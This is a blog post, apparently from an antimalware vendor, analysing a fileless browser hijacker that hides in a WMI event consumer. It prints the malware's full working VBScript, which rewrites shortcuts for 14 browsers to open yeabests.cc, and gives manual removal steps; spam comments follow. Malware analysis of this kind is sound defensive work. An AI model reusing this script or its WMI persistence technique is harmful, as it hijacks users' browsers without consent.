Sunday, April 24, 2016

Yeabests.cc Fileless Browser Hijacker



Recently, we discovered browser hijacker altering shortcuts by inserting http://yeabests.cc argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:


This is nothing new when it comes to browser hijacking, I would say it's well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.

This so-called fileless malware lives inside WMI (Windows Management Instrumentation) or more precisely, as a Visual Basic script inside ActiveScriptEventConsumer class.

The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder in %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect since it uses a not-so-common WMI application scrcons.exe rather than the traditional JS application wscript.exe.

Windows built-in application wbemtest.exe or WMIExplorer can be used to access this script.


Below is the content of VBScript used to hijack browsers:
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Rafael\Desktop"
FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
 Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

As you can see, malware is able to hijack 14 different browsers by checking their executables:

 IEXPLORE.EXE
 chrome.exe
 firefox.exe
 360chrome.exe
 360SE.exe
 SogouExplorer.exe
 opera.exe
 Safari.exe
 Maxthon.exe
 TTraveler.exe
 TheWorld.exe
 baidubrowser.exe
 liebao.exe
 QQBrowser.exe

Zemana AntiMalware removes this malware and cleans altered shortcuts.



Manual removal

The manual removal of this malware isn't hard at all.
  • Press Windows button + R on your keyboard at the same time. Type wbemtest and click OK.

  • Windows Management Instrumentation Tester window will open. Click Connect.

  • Type root\subscription exactly like on the image below:


  • Click Open Class on the next window and type ActiveScriptEventConsumer.

























  • Now you need to click Instances.

  • And then to finally remove this malware:





















Only thing left is to remove argument from your browser shortcuts.
  • Right click on desired shortcut and select Properties.
  • Remove http://yeabests.cc argument after "
  • Click OK to apply changes.

Save yourself the hassle and install Zemana AntiMalware.


Additional Information:

Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer

Resources:



3 comments:

  1. You just saved my day! Thanks!

    ReplyDelete
  2. Trojan steed contaminations have dependably been a danger that made repulsiveness among web clients and this is for the most part since they were made for the fundamental reason for permitting outsiders and programmers access to any framework and thus may turn out to be more destructive than infection programs. my review here

    ReplyDelete
  3. A particular element of the thieves is that they take the client's program under full control, and don't leave him a shot. The program changes the settings of the program, the default internet searcher and uncovered its own landing page. https://how-to-remove.org/malware/browser-hijacker-removal/gotowebs-com-removal/

    ReplyDelete